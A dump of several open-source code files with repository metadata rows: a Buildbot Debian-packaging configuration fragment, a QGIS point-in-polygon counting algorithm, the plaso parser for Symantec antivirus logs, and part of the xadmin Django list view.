builderNames.append(project_name + "_" + platform['name'])
scheduler = schedulers.SingleBranchScheduler(
name=project_name + "_deb",
change_filter=util.ChangeFilter(project = git_project_name, branch=branch),
treeStableTimer=1*60,
builderNames=builderNames,)
c['schedulers'].append(scheduler)
c['schedulers'].append(schedulers.ForceScheduler(
name=project_name + "_force_deb",
builderNames=builderNames,))
deb_name = repository['deb']
code_dir_last = deb_name + '_code'
code_dir = root_dir + '/' + code_dir_last
for platform in platforms:
if platform['name'] not in repository['os']:
continue
factory = util.BuildFactory()
# 1. checkout the source
factory.addStep(steps.Git(repourl=repourl,
mode='full', shallow=True, submodules=True,
workdir=code_dir))
factory.addStep(steps.ShellSequence(commands=[
util.ShellArg(command=["curl", script_src, '-o', script_name, '-s', '-L'],
logname=logname),
],
name="Download scripts",
haltOnFailure=True,
workdir=root_dir))
factory.addStep(steps.ShellCommand(command=["python", script_name, '-op', 'add_repka_repo',
'--repo_id', repository['repo_id'], '--login', username, '--password', userkey
],
name="Add apt repository", haltOnFailure=True, workdir=root_dir))
if 'apt_repos' in repository:
for apt_repo_info in repository['apt_repos']:
if apt_repo_info['type'] == 'repka':
factory.addStep(steps.ShellCommand(command=["python", script_name,
'-op', 'add_repka_repo', '--repo_id', apt_repo_info['repka_id'],
'--login', username, '--password', userkey
],
name="Add additional repka apt repository", haltOnFailure=True, workdir=root_dir))
elif apt_repo_info['type'] == 'deb':
factory.addStep(steps.ShellCommand(command=["python", script_name,
'-op', 'add_deb_repo', '--deb', apt_repo_info['deb'].format(platform['name']),
'--deb_key', apt_repo_info['key'],
'--deb_keyserver', apt_repo_info['keyserver']
],
name="Add additional deb apt repository", haltOnFailure=True, workdir=root_dir))
factory.addStep(steps.ShellCommand(command=["apt-get", "-y", "upgrade"],
env={'DEBIAN_FRONTEND': 'noninteractive'},
name="Upgrade packages"))
factory.addStep(steps.ShellCommand(command=['python', script_name, '-op', 'create_debian', '-vf', 'ver/version.str',
'-rp', code_dir_last, '-dp', '.', '-pn', deb_name, '--repo_id', repository['repo_id'], '--login', username,
'--password', userkey
],
name="Create debian directory", haltOnFailure=True, workdir=root_dir))
factory.addStep(steps.ShellCommand(command=['mk-build-deps', '--install',
'--tool=apt -o Debug::pkgProblemResolver=yes --no-install-recommends --yes', 'debian/control'
],
name="Install dependencies", haltOnFailure=True, timeout=25 * 60,
maxTime=2 * 60 * 60, workdir=code_dir))
# 2. Make configure to generate version.str
factory.addStep(steps.MakeDirectory(dir=ver_dir, name="Make ver directory"))
factory.addStep(steps.ShellCommand(command=["cmake", '-DBUILD_TESTING=OFF', '-DBUILD_NEXTGIS_PACKAGE=ON' ,'../' + code_dir_last],
name="Make configure to generate version.str",
workdir=ver_dir, warnOnFailure=True, env=get_env(platform['name'])
))
# 3. Create debian folder
factory.addStep(steps.ShellCommand(command=['python', script_name, '-op', 'changelog', '-vf', 'ver/version.str',
'-rp', code_dir_last, '-dp', '.', '-pn', deb_name, '--repo_id', repository['repo_id'], '--login', username,
'--password', userkey
],
name="Create debian changelog", haltOnFailure=True, workdir=root_dir))
# 4. Create packages
factory.addStep(steps.ShellSequence(commands=[
util.ShellArg(command=["dpkg-buildpackage", '-b', '-us', '-uc'],
logname=logname),
],
name="Create packages", haltOnFailure=True, timeout=125 * 60,
maxTime=5 * 60 * 60, workdir=code_dir, env=get_env(platform['name']),
))
# 5. Upload to repka
factory.addStep(steps.ShellCommand(command=['python', script_name, '-op', 'make_release', '-vf', 'ver/version.str',
'-rp', code_dir_last, '-dp', '.', '-pn', deb_name, '--repo_id', repository['repo_id'], '--login', username,
'--password', userkey
],
name="Upload to repka", haltOnFailure=True, timeout=125 * 60,
maxTime=5 * 60 * 60, workdir=root_dir))
builder = util.BuilderConfig(name = project_name + "_" + platform['name'],
workernames = [platform['worker']],
factory = factory,
locks = [build_lock.access('exclusive')], # counting
description="Make {} on {}".format(project_name, platform['name']),)
c['builders'].append(builder)
| gpl-2.0 | 597,300,990,202,796,500 | 59.201878 | 316 | 0.562583 | false |
mweisman/QGIS | python/plugins/processing/algs/ftools/PointsInPolygonUnique.py | 6 | 4944 | # -*- coding: utf-8 -*-
"""
***************************************************************************
PointsInPolygon.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import *
from qgis.core import *
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.parameters.ParameterVector import ParameterVector
from processing.parameters.ParameterString import ParameterString
from processing.parameters.ParameterTableField import ParameterTableField
from processing.outputs.OutputVector import OutputVector
from processing.tools import dataobjects, vector
class PointsInPolygonUnique(GeoAlgorithm):
POLYGONS = 'POLYGONS'
POINTS = 'POINTS'
OUTPUT = 'OUTPUT'
FIELD = 'FIELD'
CLASSFIELD = 'CLASSFIELD'
# =========================================================================
# def getIcon(self):
# return QIcon(os.path.dirname(__file__) + "/icons/sum_points.png")
# =========================================================================
def defineCharacteristics(self):
self.name = 'Count unique points in polygon'
self.group = 'Vector analysis tools'
self.addParameter(ParameterVector(self.POLYGONS, 'Polygons',
[ParameterVector.VECTOR_TYPE_POLYGON]))
self.addParameter(ParameterVector(self.POINTS, 'Points',
[ParameterVector.VECTOR_TYPE_POINT]))
self.addParameter(ParameterTableField(self.CLASSFIELD, 'Class field',
self.POINTS))
self.addParameter(ParameterString(self.FIELD, 'Count field name',
'NUMPOINTS'))
self.addOutput(OutputVector(self.OUTPUT, 'Result'))
def processAlgorithm(self, progress):
polyLayer = dataobjects.getObjectFromUri(
self.getParameterValue(self.POLYGONS))
pointLayer = dataobjects.getObjectFromUri(
self.getParameterValue(self.POINTS))
fieldName = self.getParameterValue(self.FIELD)
classFieldName = self.getParameterValue(self.CLASSFIELD)
polyProvider = polyLayer.dataProvider()
classFieldIndex = pointLayer.fieldNameIndex(classFieldName)
(idxCount, fieldList) = vector.findOrCreateField(polyLayer,
polyLayer.pendingFields(), fieldName)
writer = self.getOutputFromName(
self.OUTPUT).getVectorWriter(fieldList.toList(),
polyProvider.geometryType(),
polyProvider.crs())
spatialIndex = vector.spatialindex(pointLayer)
ftPoint = QgsFeature()
outFeat = QgsFeature()
geom = QgsGeometry()
current = 0
hasIntersections = False
features = vector.features(polyLayer)
total = 100.0 / float(len(features))
for ftPoly in features:
geom = ftPoly.geometry()
attrs = ftPoly.attributes()
classes = []
hasIntersections = False
points = spatialIndex.intersects(geom.boundingBox())
if len(points) > 0:
hasIntersections = True
if hasIntersections:
for i in points:
request = QgsFeatureRequest().setFilterFid(i)
ftPoint = pointLayer.getFeatures(request).next()
tmpGeom = QgsGeometry(ftPoint.geometry())
if geom.contains(tmpGeom):
clazz = ftPoint.attributes()[classFieldIndex]
if not clazz in classes:
classes.append(clazz)
outFeat.setGeometry(geom)
if idxCount == len(attrs):
attrs.append(len(classes))
else:
attrs[idxCount] = len(classes)
outFeat.setAttributes(attrs)
writer.addFeature(outFeat)
current += 1
progress.setPercentage(current / total)
del writer
| gpl-2.0 | 3,896,842,395,292,248,600 | 38.552 | 79 | 0.535599 | false |
rgayon/plaso | plaso/parsers/symantec.py | 1 | 12476 | # -*- coding: utf-8 -*-
"""This file contains a Symantec parser in plaso."""
from __future__ import unicode_literals
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import dsv_parser
from plaso.parsers import manager
class SymantecEventData(events.EventData):
"""Symantec event data.
Attributes:
access (str): access.
action0 (str): action0.
action1 (str): action1.
action1_status (str): action1 status.
action2 (str): action2.
action2_status (str): action2 status.
address (str): address.
backup_id (str): backup identifier.
cat (str): category.
cleaninfo (str): clean information.
clientgroup (str): client group.
compressed (str): compressed.
computer (str): computer.
definfo (str): definfo.
defseqnumber (str): def sequence number.
deleteinfo (str): delete information.
depth (str): depth.
description (str): description.
domain_guid (str): domain identifier (GUID).
domainname (str): domain name.
err_code (str): error code.
event_data (str): event data.
event (str): event.
extra (str): extra.
file (str): file.
flags (str): flags.
groupid (str): group identifier.
guid (str): guid.
license_expiration_dt (str): license expiration date.
license_feature_name (str): license feature name.
license_feature_ver (str): license feature ver.
license_fulfillment_id (str): license fulfillment identifier.
license_lifecycle (str): license lifecycle.
license_seats_delta (str): license seats delta.
license_seats (str): license seats.
license_seats_total (str): license seats total.
license_serial_num (str): license serial number.
license_start_dt (str): license start date.
logger (str): logger.
login_domain (str): login domain.
log_session_guid (str): log session identifier (GUID).
macaddr (str): MAC address.
new_ext (str): new ext.
ntdomain (str): ntdomain.
offset (str): offset.
parent (str): parent.
quarfwd_status (str): quarfwd status.
remote_machine_ip (str): remote machine IP address.
remote_machine (str): remote machine.
scanid (str): scan identifier.
snd_status (str): snd status.
status (str): status.
still_infected (str): still infected.
time (str): time.
user (str): user.
vbin_id (str): vbin identifier.
vbin_session_id (str): vbin session identifier.
version (str): version.
virus_id (str): virus identifier.
virus (str): virus.
virustype (str): virustype.
"""
DATA_TYPE = 'av:symantec:scanlog'
def __init__(self):
"""Initializes event data."""
super(SymantecEventData, self).__init__(data_type=self.DATA_TYPE)
self.access = None
self.action0 = None
self.action1 = None
self.action1_status = None
self.action2 = None
self.action2_status = None
self.address = None
self.backup_id = None
self.cat = None
self.cleaninfo = None
self.clientgroup = None
self.compressed = None
self.computer = None
self.definfo = None
self.defseqnumber = None
self.deleteinfo = None
self.depth = None
self.description = None
self.domain_guid = None
self.domainname = None
self.err_code = None
self.event_data = None
self.event = None
self.extra = None
self.file = None
self.flags = None
self.groupid = None
self.guid = None
self.license_expiration_dt = None
self.license_feature_name = None
self.license_feature_ver = None
self.license_fulfillment_id = None
self.license_lifecycle = None
self.license_seats_delta = None
self.license_seats = None
self.license_seats_total = None
self.license_serial_num = None
self.license_start_dt = None
self.logger = None
self.login_domain = None
self.log_session_guid = None
self.macaddr = None
self.new_ext = None
self.ntdomain = None
self.offset = None
self.parent = None
self.quarfwd_status = None
self.remote_machine_ip = None
self.remote_machine = None
self.scanid = None
self.snd_status = None
self.status = None
self.still_infected = None
self.time = None
self.user = None
self.vbin_id = None
self.vbin_session_id = None
self.version = None
self.virus_id = None
self.virus = None
self.virustype = None
class SymantecParser(dsv_parser.DSVParser):
"""Parses Symantec AV Corporate Edition and Endpoint Protection log files."""
NAME = 'symantec_scanlog'
DATA_FORMAT = 'AV Corporate Edition and Endpoint Protection log file'
# Define the columns that make up the structure of a Symantec log file.
# http://www.symantec.com/docs/TECH100099
COLUMNS = [
'time', 'event', 'cat', 'logger', 'computer', 'user',
'virus', 'file', 'action1', 'action2', 'action0', 'virustype',
'flags', 'description', 'scanid', 'new_ext', 'groupid',
'event_data', 'vbin_id', 'virus_id', 'quarfwd_status',
'access', 'snd_status', 'compressed', 'depth', 'still_infected',
'definfo', 'defseqnumber', 'cleaninfo', 'deleteinfo',
'backup_id', 'parent', 'guid', 'clientgroup', 'address',
'domainname', 'ntdomain', 'macaddr', 'version:',
'remote_machine', 'remote_machine_ip', 'action1_status',
'action2_status', 'license_feature_name', 'license_feature_ver',
'license_serial_num', 'license_fulfillment_id', 'license_start_dt',
'license_expiration_dt', 'license_lifecycle', 'license_seats_total',
'license_seats', 'err_code', 'license_seats_delta', 'status',
'domain_guid', 'log_session_guid', 'vbin_session_id',
'login_domain', 'extra']
def _GetTimeElementsTuple(self, timestamp):
"""Retrieves a time elements tuple from the timestamp.
A Symantec log timestamp consist of six hexadecimal octets, that represent:
First octet: Number of years since 1970
Second octet: Month, where January is represented by 0
Third octet: Day of the month
Fourth octet: Number of hours
Fifth octet: Number of minutes
Sixth octet: Number of seconds
For example, 200A13080122 represents November 19, 2002, 8:01:34 AM.
Args:
timestamp (str): hexadecimal encoded date and time values.
Returns:
tuple: containing:
year (int): year.
month (int): month, where 1 represents January.
day_of_month (int): day of month, where 1 is the first day of the month.
hours (int): hours.
minutes (int): minutes.
seconds (int): seconds.
"""
year, month, day_of_month, hours, minutes, seconds = (
int(hexdigit[0] + hexdigit[1], 16) for hexdigit in zip(
timestamp[::2], timestamp[1::2]))
return (year + 1970, month + 1, day_of_month, hours, minutes, seconds)
def ParseRow(self, parser_mediator, row_offset, row):
"""Parses a line of the log file and produces events.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row_offset (int): line number of the row.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
"""
time_elements_tuple = self._GetTimeElementsTuple(row['time'])
try:
date_time = dfdatetime_time_elements.TimeElements(
time_elements_tuple=time_elements_tuple)
date_time.is_local_time = True
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid date time value: {0!s}'.format(time_elements_tuple))
return
# TODO: remove unused attributes.
event_data = SymantecEventData()
event_data.access = row.get('access', None)
event_data.action0 = row.get('action0', None)
event_data.action1 = row.get('action1', None)
event_data.action1_status = row.get('action1_status', None)
event_data.action2 = row.get('action2', None)
event_data.action2_status = row.get('action2_status', None)
event_data.address = row.get('address', None)
event_data.backup_id = row.get('backup_id', None)
event_data.cat = row.get('cat', None)
event_data.cleaninfo = row.get('cleaninfo', None)
event_data.clientgroup = row.get('clientgroup', None)
event_data.compressed = row.get('compressed', None)
event_data.computer = row.get('computer', None)
event_data.definfo = row.get('definfo', None)
event_data.defseqnumber = row.get('defseqnumber', None)
event_data.deleteinfo = row.get('deleteinfo', None)
event_data.depth = row.get('depth', None)
event_data.description = row.get('description', None)
event_data.domain_guid = row.get('domain_guid', None)
event_data.domainname = row.get('domainname', None)
event_data.err_code = row.get('err_code', None)
event_data.event_data = row.get('event_data', None)
event_data.event = row.get('event', None)
event_data.extra = row.get('extra', None)
event_data.file = row.get('file', None)
event_data.flags = row.get('flags', None)
event_data.groupid = row.get('groupid', None)
event_data.guid = row.get('guid', None)
event_data.license_expiration_dt = row.get('license_expiration_dt', None)
event_data.license_feature_name = row.get('license_feature_name', None)
event_data.license_feature_ver = row.get('license_feature_ver', None)
event_data.license_fulfillment_id = row.get('license_fulfillment_id', None)
event_data.license_lifecycle = row.get('license_lifecycle', None)
event_data.license_seats_delta = row.get('license_seats_delta', None)
event_data.license_seats = row.get('license_seats', None)
event_data.license_seats_total = row.get('license_seats_total', None)
event_data.license_serial_num = row.get('license_serial_num', None)
event_data.license_start_dt = row.get('license_start_dt', None)
event_data.logger = row.get('logger', None)
event_data.login_domain = row.get('login_domain', None)
event_data.log_session_guid = row.get('log_session_guid', None)
event_data.macaddr = row.get('macaddr', None)
event_data.new_ext = row.get('new_ext', None)
event_data.ntdomain = row.get('ntdomain', None)
event_data.offset = row_offset
event_data.parent = row.get('parent', None)
event_data.quarfwd_status = row.get('quarfwd_status', None)
event_data.remote_machine_ip = row.get('remote_machine_ip', None)
event_data.remote_machine = row.get('remote_machine', None)
event_data.scanid = row.get('scanid', None)
event_data.snd_status = row.get('snd_status', None)
event_data.status = row.get('status', None)
event_data.still_infected = row.get('still_infected', None)
event_data.time = row.get('time', None)
event_data.user = row.get('user', None)
event_data.vbin_id = row.get('vbin_id', None)
event_data.vbin_session_id = row.get('vbin_session_id', None)
event_data.version = row.get('version:', None)
event_data.virus_id = row.get('virus_id', None)
event_data.virus = row.get('virus', None)
event_data.virustype = row.get('virustype', None)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
def VerifyRow(self, parser_mediator, row):
"""Verifies if a line of the file is in the expected format.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
Returns:
bool: True if this is the correct parser, False otherwise.
"""
try:
time_elements_tuple = self._GetTimeElementsTuple(row['time'])
except (TypeError, ValueError):
return False
try:
dfdatetime_time_elements.TimeElements(
time_elements_tuple=time_elements_tuple)
except ValueError:
return False
try:
my_event = int(row['event'], 10)
except (TypeError, ValueError):
return False
if my_event < 1 or my_event > 77:
return False
try:
category = int(row['cat'], 10)
except (TypeError, ValueError):
return False
if category < 1 or category > 4:
return False
return True
manager.ParsersManager.RegisterParser(SymantecParser)
| apache-2.0 | 2,688,859,780,277,799,400 | 36.241791 | 80 | 0.664716 | false |
LennonChin/Django-Practices | MxOnline/extra_apps/xadmin/views/list.py | 1 | 26491 | from collections import OrderedDict
from django.core.exceptions import PermissionDenied, ObjectDoesNotExist
from django.core.paginator import InvalidPage, Paginator
from django.core.urlresolvers import NoReverseMatch
from django.db import models
from django.http import HttpResponseRedirect
from django.template.response import SimpleTemplateResponse, TemplateResponse
from django.utils.encoding import force_unicode, smart_unicode
from django.utils.html import escape, conditional_escape
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from xadmin.util import lookup_field, display_for_field, label_for_field, boolean_icon
from base import ModelAdminView, filter_hook, inclusion_tag, csrf_protect_m
# List settings
ALL_VAR = 'all'
ORDER_VAR = 'o'
PAGE_VAR = 'p'
TO_FIELD_VAR = 't'
COL_LIST_VAR = '_cols'
ERROR_FLAG = 'e'
DOT = '.'
# Text to display within change-list table cells if the value is blank.
EMPTY_CHANGELIST_VALUE = _('Null')
class FakeMethodField(object):
"""
This class used when a column is an model function, wrap function as a fake field to display in select columns.
"""
def __init__(self, name, verbose_name):
# Initial comm field attrs
self.name = name
self.verbose_name = verbose_name
self.primary_key = False
class ResultRow(dict):
pass
class ResultItem(object):
def __init__(self, field_name, row):
self.classes = []
self.text = ' '
self.wraps = []
self.tag = 'td'
self.tag_attrs = []
self.allow_tags = False
self.btns = []
self.menus = []
self.is_display_link = False
self.row = row
self.field_name = field_name
self.field = None
self.attr = None
self.value = None
@property
def label(self):
text = mark_safe(
self.text) if self.allow_tags else conditional_escape(self.text)
if force_unicode(text) == '':
text = mark_safe(' ')
for wrap in self.wraps:
text = mark_safe(wrap % text)
return text
@property
def tagattrs(self):
return mark_safe(
'%s%s' % ((self.tag_attrs and ' '.join(self.tag_attrs) or ''),
(self.classes and (' class="%s"' % ' '.join(self.classes)) or '')))
class ResultHeader(ResultItem):
def __init__(self, field_name, row):
super(ResultHeader, self).__init__(field_name, row)
self.tag = 'th'
self.tag_attrs = ['scope="col"']
self.sortable = False
self.allow_tags = True
self.sorted = False
self.ascending = None
self.sort_priority = None
self.url_primary = None
self.url_remove = None
self.url_toggle = None
class ListAdminView(ModelAdminView):
"""
Display models objects view. this class has ordering and simple filter features.
"""
list_display = ('__str__',)
list_display_links = ()
list_display_links_details = False
list_select_related = None
list_per_page = 50
list_max_show_all = 200
list_exclude = ()
search_fields = ()
paginator_class = Paginator
ordering = None
# Change list templates
object_list_template = None
def init_request(self, *args, **kwargs):
if not self.has_view_permission():
raise PermissionDenied
request = self.request
request.session['LIST_QUERY'] = (self.model_info, self.request.META['QUERY_STRING'])
self.pk_attname = self.opts.pk.attname
self.lookup_opts = self.opts
self.list_display = self.get_list_display()
self.list_display_links = self.get_list_display_links()
# Get page number parameters from the query string.
try:
self.page_num = int(request.GET.get(PAGE_VAR, 0))
except ValueError:
self.page_num = 0
# Get params from request
self.show_all = ALL_VAR in request.GET
self.to_field = request.GET.get(TO_FIELD_VAR)
self.params = dict(request.GET.items())
if PAGE_VAR in self.params:
del self.params[PAGE_VAR]
if ERROR_FLAG in self.params:
del self.params[ERROR_FLAG]
@filter_hook
def get_list_display(self):
"""
Return a sequence containing the fields to be displayed on the list.
"""
self.base_list_display = (COL_LIST_VAR in self.request.GET and self.request.GET[COL_LIST_VAR] != "" and \
self.request.GET[COL_LIST_VAR].split('.')) or self.list_display
return list(self.base_list_display)
@filter_hook
def get_list_display_links(self):
"""
Return a sequence containing the fields to be displayed as links
on the changelist. The list_display parameter is the list of fields
returned by get_list_display().
"""
if self.list_display_links or not self.list_display:
return self.list_display_links
else:
# Use only the first item in list_display as link
return list(self.list_display)[:1]
def make_result_list(self):
# Get search parameters from the query string.
self.base_queryset = self.queryset()
self.list_queryset = self.get_list_queryset()
self.ordering_field_columns = self.get_ordering_field_columns()
self.paginator = self.get_paginator()
# Get the number of objects, with admin filters applied.
self.result_count = self.paginator.count
# Get the total number of objects, with no admin filters applied.
# Perform a slight optimization: Check to see whether any filters were
# given. If not, use paginator.hits to calculate the number of objects,
# because we've already done paginator.hits and the value is cached.
if not self.list_queryset.query.where:
self.full_result_count = self.result_count
else:
self.full_result_count = self.base_queryset.count()
self.can_show_all = self.result_count <= self.list_max_show_all
self.multi_page = self.result_count > self.list_per_page
# Get the list of objects to display on this page.
if (self.show_all and self.can_show_all) or not self.multi_page:
self.result_list = self.list_queryset._clone()
else:
try:
self.result_list = self.paginator.page(
self.page_num + 1).object_list
except InvalidPage:
if ERROR_FLAG in self.request.GET.keys():
return SimpleTemplateResponse('xadmin/views/invalid_setup.html', {
'title': _('Database error'),
})
return HttpResponseRedirect(self.request.path + '?' + ERROR_FLAG + '=1')
self.has_more = self.result_count > (
self.list_per_page * self.page_num + len(self.result_list))
@filter_hook
def get_result_list(self):
return self.make_result_list()
@filter_hook
def post_result_list(self):
return self.make_result_list()
@filter_hook
def get_list_queryset(self):
"""
Get model queryset. The query has been filted and ordered.
"""
# First, get queryset from base class.
queryset = self.queryset()
# Use select_related() if one of the list_display options is a field
# with a relationship and the provided queryset doesn't already have
# select_related defined.
if not queryset.query.select_related:
if self.list_select_related:
queryset = queryset.select_related()
elif self.list_select_related is None:
related_fields = []
for field_name in self.list_display:
try:
field = self.opts.get_field(field_name)
except models.FieldDoesNotExist:
pass
else:
if isinstance(field.rel, models.ManyToOneRel):
related_fields.append(field_name)
if related_fields:
queryset = queryset.select_related(*related_fields)
else:
pass
# Then, set queryset ordering.
queryset = queryset.order_by(*self.get_ordering())
# Return the queryset.
return queryset
# List ordering
def _get_default_ordering(self):
ordering = []
if self.ordering:
ordering = self.ordering
elif self.opts.ordering:
ordering = self.opts.ordering
return ordering
@filter_hook
def get_ordering_field(self, field_name):
"""
Returns the proper model field name corresponding to the given
field_name to use for ordering. field_name may either be the name of a
proper model field or the name of a method (on the admin or model) or a
callable with the 'admin_order_field' attribute. Returns None if no
proper model field name can be matched.
"""
try:
field = self.opts.get_field(field_name)
return field.name
except models.FieldDoesNotExist:
# See whether field_name is a name of a non-field
# that allows sorting.
if callable(field_name):
attr = field_name
elif hasattr(self, field_name):
attr = getattr(self, field_name)
else:
attr = getattr(self.model, field_name)
return getattr(attr, 'admin_order_field', None)
@filter_hook
def get_ordering(self):
"""
Returns the list of ordering fields for the change list.
First we check the get_ordering() method in model admin, then we check
the object's default ordering. Then, any manually-specified ordering
from the query string overrides anything. Finally, a deterministic
order is guaranteed by ensuring the primary key is used as the last
ordering field.
"""
ordering = list(super(ListAdminView, self).get_ordering()
or self._get_default_ordering())
if ORDER_VAR in self.params and self.params[ORDER_VAR]:
# Clear ordering and used params
ordering = [pfx + self.get_ordering_field(field_name) for n, pfx, field_name in
map(
lambda p: p.rpartition('-'),
self.params[ORDER_VAR].split('.'))
if self.get_ordering_field(field_name)]
# Ensure that the primary key is systematically present in the list of
# ordering fields so we can guarantee a deterministic order across all
# database backends.
pk_name = self.opts.pk.name
if not (set(ordering) & set(['pk', '-pk', pk_name, '-' + pk_name])):
# The two sets do not intersect, meaning the pk isn't present. So
# we add it.
ordering.append('-pk')
return ordering
@filter_hook
def get_ordering_field_columns(self):
"""
Returns a OrderedDict of ordering field column numbers and asc/desc
"""
# We must cope with more than one column having the same underlying sort
# field, so we base things on column numbers.
ordering = self._get_default_ordering()
ordering_fields = OrderedDict()
if ORDER_VAR not in self.params or not self.params[ORDER_VAR]:
# for ordering specified on ModelAdmin or model Meta, we don't know
# the right column numbers absolutely, because there might be more
# than one column associated with that ordering, so we guess.
for field in ordering:
if field.startswith('-'):
field = field[1:]
order_type = 'desc'
else:
order_type = 'asc'
for attr in self.list_display:
if self.get_ordering_field(attr) == field:
ordering_fields[field] = order_type
break
else:
for p in self.params[ORDER_VAR].split('.'):
none, pfx, field_name = p.rpartition('-')
ordering_fields[field_name] = 'desc' if pfx == '-' else 'asc'
return ordering_fields
def get_check_field_url(self, f):
"""
Return the select column menu items link.
We must use base_list_display, because list_display maybe changed by plugins.
"""
fields = [fd for fd in self.base_list_display if fd != f.name]
if len(self.base_list_display) == len(fields):
if f.primary_key:
fields.insert(0, f.name)
else:
fields.append(f.name)
return self.get_query_string({COL_LIST_VAR: '.'.join(fields)})
def get_model_method_fields(self):
"""
Return the fields info defined in model. use FakeMethodField class wrap method as a db field.
"""
methods = []
for name in dir(self):
try:
if getattr(getattr(self, name), 'is_column', False):
methods.append((name, getattr(self, name)))
except:
pass
return [FakeMethodField(name, getattr(method, 'short_description', capfirst(name.replace('_', ' '))))
for name, method in methods]
@filter_hook
def get_context(self):
"""
Prepare the context for templates.
"""
self.title = _('%s List') % force_unicode(self.opts.verbose_name)
model_fields = [(f, f.name in self.list_display, self.get_check_field_url(f))
for f in (list(self.opts.fields) + self.get_model_method_fields()) if f.name not in self.list_exclude]
new_context = {
'model_name': force_unicode(self.opts.verbose_name_plural),
'title': self.title,
'cl': self,
'model_fields': model_fields,
'clean_select_field_url': self.get_query_string(remove=[COL_LIST_VAR]),
'has_add_permission': self.has_add_permission(),
'app_label': self.app_label,
'brand_name': self.opts.verbose_name_plural,
'brand_icon': self.get_model_icon(self.model),
'add_url': self.model_admin_url('add'),
'result_headers': self.result_headers(),
'results': self.results()
}
context = super(ListAdminView, self).get_context()
context.update(new_context)
return context
@filter_hook
def get_response(self, context, *args, **kwargs):
pass
@csrf_protect_m
@filter_hook
def get(self, request, *args, **kwargs):
"""
The 'change list' admin view for this model.
"""
response = self.get_result_list()
if response:
return response
context = self.get_context()
context.update(kwargs or {})
response = self.get_response(context, *args, **kwargs)
return response or TemplateResponse(request, self.object_list_template or
self.get_template_list('views/model_list.html'), context)
@filter_hook
def post_response(self, *args, **kwargs):
pass
@csrf_protect_m
@filter_hook
def post(self, request, *args, **kwargs):
return self.post_result_list() or self.post_response(*args, **kwargs) or self.get(request, *args, **kwargs)
@filter_hook
def get_paginator(self):
return self.paginator_class(self.list_queryset, self.list_per_page, 0, True)
@filter_hook
def get_page_number(self, i):
if i == DOT:
return mark_safe(u'<span class="dot-page">...</span> ')
elif i == self.page_num:
return mark_safe(u'<span class="this-page">%d</span> ' % (i + 1))
else:
return mark_safe(u'<a href="%s"%s>%d</a> ' % (escape(self.get_query_string({PAGE_VAR: i})), (i == self.paginator.num_pages - 1 and ' class="end"' or ''), i + 1))
# Result List methods
@filter_hook
def result_header(self, field_name, row):
ordering_field_columns = self.ordering_field_columns
item = ResultHeader(field_name, row)
text, attr = label_for_field(field_name, self.model,
model_admin=self,
return_attr=True
)
item.text = text
item.attr = attr
if attr and not getattr(attr, "admin_order_field", None):
return item
# OK, it is sortable if we got this far
th_classes = ['sortable']
order_type = ''
new_order_type = 'desc'
sort_priority = 0
sorted = False
# Is it currently being sorted on?
if field_name in ordering_field_columns:
sorted = True
order_type = ordering_field_columns.get(field_name).lower()
sort_priority = ordering_field_columns.keys().index(field_name) + 1
th_classes.append('sorted %sending' % order_type)
new_order_type = {'asc': 'desc', 'desc': 'asc'}[order_type]
# build new ordering param
o_list_asc = [] # URL for making this field the primary sort
o_list_desc = [] # URL for making this field the primary sort
o_list_remove = [] # URL for removing this field from sort
o_list_toggle = [] # URL for toggling order type for this field
make_qs_param = lambda t, n: ('-' if t == 'desc' else '') + str(n)
for j, ot in ordering_field_columns.items():
if j == field_name: # Same column
param = make_qs_param(new_order_type, j)
# We want clicking on this header to bring the ordering to the
# front
o_list_asc.insert(0, j)
o_list_desc.insert(0, '-' + j)
o_list_toggle.append(param)
# o_list_remove - omit
else:
param = make_qs_param(ot, j)
o_list_asc.append(param)
o_list_desc.append(param)
o_list_toggle.append(param)
o_list_remove.append(param)
if field_name not in ordering_field_columns:
o_list_asc.insert(0, field_name)
o_list_desc.insert(0, '-' + field_name)
item.sorted = sorted
item.sortable = True
item.ascending = (order_type == "asc")
item.sort_priority = sort_priority
menus = [
('asc', o_list_asc, 'caret-up', _(u'Sort ASC')),
('desc', o_list_desc, 'caret-down', _(u'Sort DESC')),
]
if sorted:
row['num_sorted_fields'] = row['num_sorted_fields'] + 1
menus.append((None, o_list_remove, 'times', _(u'Cancel Sort')))
item.btns.append('<a class="toggle" href="%s"><i class="fa fa-%s"></i></a>' % (
self.get_query_string({ORDER_VAR: '.'.join(o_list_toggle)}), 'sort-up' if order_type == "asc" else 'sort-down'))
item.menus.extend(['<li%s><a href="%s" class="active"><i class="fa fa-%s"></i> %s</a></li>' %
(
(' class="active"' if sorted and order_type == i[
0] else ''),
self.get_query_string({ORDER_VAR: '.'.join(i[1])}), i[2], i[3]) for i in menus])
item.classes.extend(th_classes)
return item
@filter_hook
def result_headers(self):
"""
Generates the list column headers.
"""
row = ResultRow()
row['num_sorted_fields'] = 0
row.cells = [self.result_header(
field_name, row) for field_name in self.list_display]
return row
@filter_hook
def result_item(self, obj, field_name, row):
"""
Generates the actual list of data.
"""
item = ResultItem(field_name, row)
try:
f, attr, value = lookup_field(field_name, obj, self)
except (AttributeError, ObjectDoesNotExist, NoReverseMatch):
item.text = mark_safe("<span class='text-muted'>%s</span>" % EMPTY_CHANGELIST_VALUE)
else:
if f is None:
item.allow_tags = getattr(attr, 'allow_tags', False)
boolean = getattr(attr, 'boolean', False)
if boolean:
item.allow_tags = True
item.text = boolean_icon(value)
else:
